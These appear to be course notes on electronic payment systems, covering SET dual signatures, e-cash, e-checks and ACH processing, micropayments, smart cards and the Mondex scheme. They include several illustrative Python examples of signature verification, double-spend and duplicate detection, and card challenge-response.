Step 3: Finally he compares the two terms H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign,cardholder ]. They should be the same if the transmitted DS has not been changed; otherwise the order is not valid.

The payment gateway is provided with PI, H[OI] and DS.

By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party. If either the OI or the PI is changed, the dual signature will no longer be valid.
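The three verification steps above, together with the gateway's mirror-image check, can be run end to end. The following is an added example in Python, not code from the original notes or from the SET specification: the cardholder computes DS = Sign(H[H[PI] || H[OI]]), the merchant verifies from OI and H[PI] only, and the payment gateway verifies from PI and H[OI] only, so neither party ever holds the other's plaintext. The RSA key is a toy built from two Mersenne primes so that a SHA-256 digest can be signed directly; that key, the absence of padding and the sample OI/PI are constructed for the demonstration and not secure (SET itself used SHA-1 and padded 1024-bit RSA).

```python
import hashlib

# Toy RSA key pair, constructed for illustration only.  Two Mersenne primes
# give a modulus wider than a SHA-256 digest so the digest can be signed as
# an integer; predictable primes and no padding make this key insecure.
P = 2**127 - 1
Q = 2**607 - 1
N = P * Q                              # modulus, part of the public key
E = 65537                              # public exponent  (key_public_sign,cardholder)
D = pow(E, -1, (P - 1) * (Q - 1))      # private exponent (key_private_sign,cardholder)

def H(data: bytes) -> bytes:
    """Message digest H[...]; SET specified SHA-1, SHA-256 is used here."""
    return hashlib.sha256(data).digest()

def rsa_sign(digest: bytes) -> int:
    """Cardholder: DS = digest^d mod n, signed with the private signature key."""
    return pow(int.from_bytes(digest, "big"), D, N)

def rsa_verify(ds: int, digest: bytes) -> bool:
    """D_RSA[DS | public key]: recover DS^e mod n and compare with the digest."""
    return pow(ds, E, N) == int.from_bytes(digest, "big")

def dual_sign(oi: bytes, pi: bytes) -> int:
    """Cardholder links order and payment: DS = Sign( H[ H[PI] || H[OI] ] )."""
    return rsa_sign(H(H(pi) + H(oi)))

def merchant_verify(oi: bytes, h_pi: bytes, ds: int) -> bool:
    """Steps 1-3 above: the merchant holds OI, H[PI] and DS, never PI itself."""
    return rsa_verify(ds, H(h_pi + H(oi)))

def gateway_verify(pi: bytes, h_oi: bytes, ds: int) -> bool:
    """The payment gateway holds PI, H[OI] and DS, never OI itself."""
    return rsa_verify(ds, H(H(pi) + h_oi))

def demo() -> dict:
    # Constructed order information (OI) and payment instruction (PI).
    oi = b"order: item=textbook-4411; qty=1; total=19.99"
    pi = b"payment: card=4111-xxxx-xxxx-1111; exp=12/29; total=19.99"
    ds = dual_sign(oi, pi)
    return {
        "merchant_ok": merchant_verify(oi, H(pi), ds),
        "gateway_ok": gateway_verify(pi, H(oi), ds),
        # A changed order no longer matches the signature the merchant received.
        "tampered_oi_ok": merchant_verify(oi.replace(b"19.99", b"1.99"), H(pi), ds),
        # A different payment instruction cannot be paired with the original OI.
        "swapped_pi_ok": gateway_verify(b"payment: card=other", H(oi), ds),
    }

if __name__ == "__main__":
    print(demo())
```

The point to notice is the argument lists: `merchant_verify` takes `h_pi`, not `pi`, and `gateway_verify` takes `h_oi`, not `oi`, yet both recompute the same outer hash and check it against the one signature.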

DIGITAL ENVELOPE –

SET PROTOCOL –

The SET protocol has four phases: initiation, purchase, authorization and capture.

1. First, the cardholder sends a purchase initiation request to the merchant for initializing the payment. Then the merchant returns a response message to the cardholder.

2. In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.

3. In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.

4. Finally, the merchant requests a money transfer to its account.

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card. The most common examples are transit cards, meal plans and PayPal. E-Cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

Issuers

Customers

Merchants or traders

Regulators

Issuers can be banks or non-bank institutions. Customers are the users who spend E-Cash. Merchants and traders are vendors who receive E-Cash. Regulators are the related authorities or state tax agencies.

For an E-Cash transaction to occur, we need to go through at least three stages:

Account Setup: Customers will need to obtain E-Cash accounts through certain issuers. Merchants who would like to accept E-Cash will also need to arrange accounts with various E-Cash issuers. Issuers typically handle accounting for customers and merchants.

Purchase: Customers purchase certain goods or services and give the merchants tokens which represent equivalent E-Cash. Purchase information is usually encrypted when transmitted over the network.

Authentication: Merchants will need to contact E-Cash issuers about the purchase and the amount of E-Cash involved. E-Cash issuers will then authenticate the transaction and approve the amount of E-Cash involved.

E-cash payment system –

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works.

This is a simple model of the E-cash payment system. It gives us the idea of how the e-cash payment system works; the model is explained in the following slides.

The customer approaches his issuer's (bank's) site to access his account. The issuer in return issues the money in the form of tokens, which are generally in denominations of tens and hundreds, or as specified by the customer.

In the second phase, the customer endorses those tokens to the merchant to acquire services, for which the customer authenticates the payment to the trader.

In the third phase, the trader approaches the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank converts the tokens into electronic funds, which are transferred into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

E-cash is a system that allows a person to pay for goods or services by transmitting a number from one computer to another.

Like the serial numbers on real currency notes, the E-cash numbers are unique. Each is issued by a bank and represents a specified sum of real money. It is anonymous and reusable.

Electronic Cash Security

Complex cryptographic algorithms prevent double spending.

Anonymity is preserved unless double spending is attempted.

Serial numbers can allow tracing to prevent money laundering.
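The three-stage model above (issue tokens, spend them at a merchant, merchant presents them to the issuer for authentication) and the double-spending point just made can be shown as a small issuer in Python. This is an added example, not code from the original notes or from any real e-cash product: tokens carry a unique serial number and an HMAC tag that stands in for the issuer's signature, and the issuer keeps the set of serial numbers it has already redeemed so that a second presentation of the same token is refused. The `Issuer` class, its method names and the sample values are constructed for the demonstration; it models only the online double-spend check, not the blind-signature step that gives Chaum-style e-cash its anonymity.

```python
import hashlib
import hmac
import secrets

class Issuer:
    """Bank-side token issuer (constructed model).  The HMAC tag stands in for
    the issuer's signature; the spent set is what defeats double spending."""

    def __init__(self) -> None:
        self._key = secrets.token_bytes(32)   # issuer's secret key for tagging tokens
        self._spent: set = set()              # serial numbers already redeemed
        self.ledger: list = []                # audit trail: (serial, value, merchant)

    def _tag(self, serial: str, value: int) -> str:
        msg = f"{serial}|{value}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def mint(self, value: int) -> dict:
        """Account setup / withdrawal: the customer receives a token worth `value`.
        The serial number is unique, like the number on a banknote."""
        serial = secrets.token_hex(16)
        return {"serial": serial, "value": value, "tag": self._tag(serial, value)}

    def redeem(self, token: dict, merchant: str) -> str:
        """Authentication stage: the merchant presents a token it was paid with."""
        expected = self._tag(token["serial"], token["value"])
        if not hmac.compare_digest(expected, token["tag"]):
            return "rejected: forged or altered token"     # tag does not match
        if token["serial"] in self._spent:
            return "rejected: double spend"                # serial seen before
        self._spent.add(token["serial"])
        self.ledger.append((token["serial"], token["value"], merchant))
        return "approved"

def demo() -> dict:
    bank = Issuer()
    token = bank.mint(100)                    # one token worth 100 units
    altered = dict(token, value=1000)         # same serial, inflated value
    return {
        "first": bank.redeem(token, "merchant-A"),
        "second": bank.redeem(token, "merchant-B"),     # same token spent again
        "altered": bank.redeem(altered, "merchant-C"),  # value changed after issue
        "ledger_len": len(bank.ledger),
    }

if __name__ == "__main__":
    print(demo())
```

Because the issuer is consulted at every purchase, the check is simple set membership; offline schemes have to detect double spending after the fact, which is where the heavier cryptography the slide refers to comes in.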

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as a card password is involved. It is simply an online fund transfer from the customer's account to the trader's account.

However, while accessing the customer's account, the customer must keep in mind Internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security systems, keeping the website link on a safe "https" protocol, and using proper Internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

We can transfer funds, purchase stocks and use a variety of other services without having to handle physical cash or cheques.

Electronic cash protects its user against theft. With electronic cash the customer does not need to provide financial information.

E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific limit for additional charges, which is why very low payments are not charged a fee.

Limitations

However secure the e-cash payment system is, no one is safe against online fraud. In this case the trader may be fraudulent: the trader may take the amount but not provide the services.

While making the payment it is very important that the Internet connection and power supply remain active. If the payment is in process and the Internet supply fails in between, it can lead to loss of information, i.e. the amount will be charged but it will not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.

E-Cash is not for everyone. Low income segments without computer and Internet access are unable to enjoy the use of E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low income group readiness and technology reliability issues will make E-Cash more perfect. Countries such as India, where people were hesitant to use such methods, have shown tremendous use of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.


E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.


Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more.

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.

2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.

3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.

4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks.

5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business, and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features.

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.

2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.

3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible.

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.

2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.

3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.

4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize an electronic debit and enter the bank routing number (ABA) and account number.

2. The merchant's sales system securely transfers order information to CyberSource over the Internet.

3. CyberSource forwards the bank routing number and account number to the processor.

4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards approve/decline results to CyberSource.

5. CyberSource returns the approval/decline message to the merchant.

6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.
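Step 4 above (validating the routing and account numbers) and the duplicate-detection control listed under "Protecting your business" can both be sketched in code. The following is an added example in Python, not code from the original notes or from CyberSource's service: it checks the ABA routing number checksum (digits weighted 3, 7, 1 repeating; the total must be a multiple of 10) and keeps a fingerprint of every item presented so that the same check cannot be settled twice. The routing numbers 123456780 (passes the checksum) and 123456789 (fails it), the account and check numbers, and the `process_echeck` flow are constructed for the demonstration; a real processor also consults the account's history and negative databases, which are not modelled here.

```python
import hashlib
from decimal import Decimal, InvalidOperation

def routing_number_valid(rtn: str) -> bool:
    """ABA routing transit number check digit: nine digits whose weighted sum
    with weights 3,7,1,3,7,1,3,7,1 is divisible by 10."""
    if len(rtn) != 9 or not rtn.isdigit():
        return False
    weights = (3, 7, 1, 3, 7, 1, 3, 7, 1)
    total = sum(int(d) * w for d, w in zip(rtn, weights))
    return total % 10 == 0

class DuplicateDetector:
    """Remembers a fingerprint of each presented item so a scanned check or
    eCheck presented a second time is caught (constructed model)."""

    def __init__(self) -> None:
        self._seen: set = set()

    @staticmethod
    def fingerprint(rtn: str, account: str, check_no: str, amount: str) -> str:
        # Routing number, account, check number and amount identify one item.
        return hashlib.sha256(f"{rtn}|{account}|{check_no}|{amount}".encode()).hexdigest()

    def is_duplicate(self, rtn: str, account: str, check_no: str, amount: str) -> bool:
        fp = self.fingerprint(rtn, account, check_no, amount)
        if fp in self._seen:
            return True
        self._seen.add(fp)
        return False

def process_echeck(detector: DuplicateDetector, rtn: str, account: str,
                   check_no: str, amount: str) -> str:
    """Processor-side checks for step 4: validate the numbers, then refuse
    duplicates before anything is sent on for ACH settlement."""
    if not routing_number_valid(rtn):
        return "declined: bad routing number"
    if not (4 <= len(account) <= 17 and account.isdigit()):
        return "declined: bad account number"
    try:
        if Decimal(amount) <= 0:
            return "declined: bad amount"
    except InvalidOperation:
        return "declined: bad amount"
    if detector.is_duplicate(rtn, account, check_no, amount):
        return "declined: duplicate presentment"
    return "approved"

def demo() -> dict:
    d = DuplicateDetector()
    # Constructed sample presentments; the second is a replay of the first.
    return {
        "first": process_echeck(d, "123456780", "000123456789", "1042", "250.00"),
        "replay": process_echeck(d, "123456780", "000123456789", "1042", "250.00"),
        "next_check": process_echeck(d, "123456780", "000123456789", "1043", "250.00"),
        "bad_rtn": process_echeck(d, "123456789", "000123456789", "1044", "250.00"),
    }

if __name__ == "__main__":
    print(demo())
```

The checksum only catches transcription errors; it says nothing about whether the account exists or has funds, which is why the processor's history and negative-database checks come after it.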

Four Different Scenarios of the FSTC E-check System –

MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as the micropayment method, is emerging to cater for very low value transactions. Examples:

Millicent (pre-payment/credit based)

PayWord (post-payment)


MICRO PAYMENT IS -

Very small payments made over the Web; transactions too small for credit cards; can be as little as a fraction of a cent; an alternative to subscription and advertising; can go in either direction.

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Heres one scheme for micropayment The user and seller each establish an account with a third-

party service provider who monitors collects and distributes micropayments The seller encodes

per-fee links inside a Web page When the user initiates a transaction payment goes through an

Internet wallet account managed by the service provider Micropayments accumulate until they

are collected as single larger payments Such a system is helpful when a user wants to make

PREPARED BY ARUN PRATAP SINGH 32

32

one-time micropayments to multiple sellers Seller-based accounts are more common for repeat

business with an individual enterprise

Once a common micropayment standard has been established some experts predict that

streaming media sites music and application downloads content vendors sports access sites

and other specialized resources will make pay-per-use common online
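The broker scheme just described, as an added example written for these notes (not any provider's system). The broker holds a wallet per user and an account per seller, accrues sub-cent charges, and pays a seller out only once its total reaches a settlement threshold. How each individual click is authorised is not spelled out in the notes; this example assumes a PayWord-style hash chain (the post-payment scheme named at the top of this section): the user commits to the root of a hash chain, each payment reveals the next preimage, and the broker verifies it with one hash instead of a signature per click, which also makes a revealed word unusable a second time. Amounts use Decimal so fractions of a cent add exactly; the seed, user and seller names are constructed.

```python
"""Micropayment aggregation through a third-party broker (added example)."""
from __future__ import annotations
import hashlib
import secrets
from decimal import Decimal


def _h(b: bytes) -> bytes:
    return hashlib.sha256(b).digest()


class PayWordChain:
    """User side. w_n is random, w_i = H(w_{i+1}); w_0 is the commitment."""

    def __init__(self, length: int, seed: bytes | None = None):
        words = [seed or secrets.token_bytes(32)]
        for _ in range(length):
            words.append(_h(words[-1]))
        words.reverse()                 # words[0] == w_0, words[length] == w_n
        self._words, self.length, self.spent = words, length, 0

    @property
    def root(self) -> bytes:
        return self._words[0]

    def pay(self) -> tuple[int, bytes]:
        """Reveal the next unspent word as (index, w_index)."""
        if self.spent >= self.length:
            raise RuntimeError("chain exhausted; user must commit a new chain")
        self.spent += 1
        return self.spent, self._words[self.spent]


def verify_payword(previous: bytes, word: bytes) -> bool:
    """w_i is valid iff H(w_i) equals the last accepted word w_{i-1}."""
    return _h(word) == previous


class Broker:
    """Third-party provider holding users' wallets and sellers' accounts."""

    def __init__(self, unit_price: Decimal, settle_at: Decimal):
        self.unit_price = unit_price          # value of one payword
        self.settle_at = settle_at            # payout threshold per seller
        self._last: dict[str, tuple[int, bytes]] = {}   # user -> (index, word)
        self.owed: dict[str, Decimal] = {}    # seller -> accrued, not yet paid out
        self.settlements: list[tuple[str, Decimal]] = []

    def register_chain(self, user: str, root: bytes) -> None:
        """User commits the chain root (signed in practice; trusted as given here)."""
        self._last[user] = (0, root)

    def accept(self, user: str, seller: str, index: int, word: bytes) -> bool:
        """Seller forwards the (index, word) it received; broker credits it."""
        last_index, last_word = self._last[user]
        # Words must arrive strictly in order; a reused word fails this check.
        if index != last_index + 1 or not verify_payword(last_word, word):
            return False
        self._last[user] = (index, word)
        self.owed[seller] = self.owed.get(seller, Decimal(0)) + self.unit_price
        if self.owed[seller] >= self.settle_at:    # collect as one larger payment
            self.settlements.append((seller, self.owed[seller]))
            self.owed[seller] = Decimal(0)
        return True


def demo() -> dict:
    """Five 0.1-cent payments trigger a 0.5-cent settlement; a replay is refused."""
    broker = Broker(unit_price=Decimal("0.001"), settle_at=Decimal("0.005"))
    chain = PayWordChain(length=10, seed=b"constructed-seed-not-for-real-use")
    broker.register_chain("alice", chain.root)
    accepted = [broker.accept("alice", "news-site", *chain.pay()) for _ in range(5)]
    idx, w = chain.pay()
    first = broker.accept("alice", "news-site", idx, w)
    replay = broker.accept("alice", "news-site", idx, w)
    return {"all_accepted": all(accepted), "replay_rejected": first and not replay,
            "settlements": broker.settlements, "owed": dict(broker.owed)}
```

Because the broker is the single verifier here, one chain per user suffices across sellers; in the original PayWord design each vendor verifies locally and the user commits a separate chain per vendor.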

Advantages and risks:

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason, micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits from the customer side in using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options:

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card: Payment by credit card. The customer enters his or her credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure method (Verified by VISA and MasterCard SecureCode).

Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal account and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses:

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized with a microchip embedded on it

Two types:

Memory-only chips

Microprocessor chips

Can hold up to 32,000 bytes

Newer smart cards have math co-processors

Perform complex encryption routines quickly

In 1968, German inventors patented the combination of plastic cards with microchips
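What a microprocessor card with a crypto co-processor is actually used for in authentication, as an added example written for these notes (not from the notes or any card vendor): a challenge-response exchange between a terminal and a card. The assumptions are that the card holds a per-card secret in tamper-resistant storage and only ever exports MACs computed with it, that the issuer derives each card's key from a master key and the card's serial number so the terminal need not store one key per card, and that HMAC-SHA256 stands in for the card's own routines. A fresh random challenge and a transaction counter bound into the MAC defeat replay of a captured response; the master key and serials are constructed.

```python
"""Terminal-to-smart-card challenge-response authentication (added example)."""
from __future__ import annotations
import hashlib
import hmac
import secrets


def derive_card_key(master_key: bytes, serial: str) -> bytes:
    """Issuer-side key diversification: one master key, one derived key per card."""
    return hmac.new(master_key, serial.encode(), hashlib.sha256).digest()


class SmartCard:
    """Simulated chip: the secret never leaves this object."""

    def __init__(self, serial: str, card_key: bytes):
        self.serial = serial
        self.__key = card_key          # name-mangled to signal "not exported"
        self.counter = 0               # transaction counter, bound into every MAC

    def respond(self, challenge: bytes) -> tuple[int, bytes]:
        """Answer a challenge with MAC(key, serial || counter || challenge)."""
        self.counter += 1
        msg = self.serial.encode() + self.counter.to_bytes(4, "big") + challenge
        return self.counter, hmac.new(self.__key, msg, hashlib.sha256).digest()


class Terminal:
    """Reader / back-end side: issues challenges and verifies responses."""

    def __init__(self, master_key: bytes):
        self._master = master_key
        self._last_counter: dict[str, int] = {}

    def new_challenge(self) -> bytes:
        return secrets.token_bytes(16)

    def verify(self, serial: str, challenge: bytes, counter: int, mac: bytes) -> bool:
        # A replayed response carries a counter that does not advance: reject it.
        if counter <= self._last_counter.get(serial, 0):
            return False
        key = derive_card_key(self._master, serial)
        msg = serial.encode() + counter.to_bytes(4, "big") + challenge
        expected = hmac.new(key, msg, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, mac):   # constant-time comparison
            return False
        self._last_counter[serial] = counter
        return True


def authenticate(terminal: Terminal, card: SmartCard) -> bool:
    """One full exchange: challenge -> card -> response -> terminal decision."""
    challenge = terminal.new_challenge()
    counter, mac = card.respond(challenge)
    return terminal.verify(card.serial, challenge, counter, mac)


if __name__ == "__main__":
    master = b"constructed-master-key"          # constructed, issuer-held secret
    terminal = Terminal(master)
    card = SmartCard("CARD-0001", derive_card_key(master, "CARD-0001"))
    print("genuine card:", authenticate(terminal, card))
    print("cloned serial, wrong key:",
          authenticate(terminal, SmartCard("CARD-0002", b"wrong-key")))
```

The card's key is never transmitted; an observer on the terminal link sees only challenges, counters and MACs, none of which let it answer a future challenge. A memory-only chip cannot do this, which is the practical difference between the two card types listed above.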

Construction of Smart Cards: (diagram)

Why Smart Cards:

Improve the convenience and security of any transaction

Provide tamper-proof storage of user and account identity

Provide vital components of system security

Protect against a full range of security threats

Advantages:

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card (diagram)

Smart card Processing (diagram)

Smart Card Applications:

Ticketless travel

Seoul bus system: 4M cards, 1B transactions since 1996

Planned for the SF Bay Area system

Authentication, ID

Medical records

Ecash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet or telephone networks, etc.

Keep transaction records

Password protection and "lock card" functions

Portable balance finder to check balance

Support multiple currencies

ADVANTAGES

CONSUMER:

Convenience

Accessibility

On-chip record of recent transactions

Home load

Internet purchases

MERCHANT:

Reliable off-line payment

Higher security

Low transaction cost

Reduced cash handling

FINANCIAL INSTITUTION:

Strengthen customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year, MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy?

Principles protected:

o Limits for collecting personal information

o Limits for using, disclosing and keeping personal information

o Keeping personal information accurate

o Safeguarding personal information

Limits for collecting personal information:

o loads from account

o deposits into account

o lost transactions

Limits for using, disclosing and keeping personal information:

o safeguard deposits

o to reimburse for non-performance

Keeping personal information accurate:

o load and unload are online

o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information:

o firewalls in Multos, between applications, ITSEC 6 designation

o transaction data to retailer is deliberately limited

o individual transaction data is not collected by banks; Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
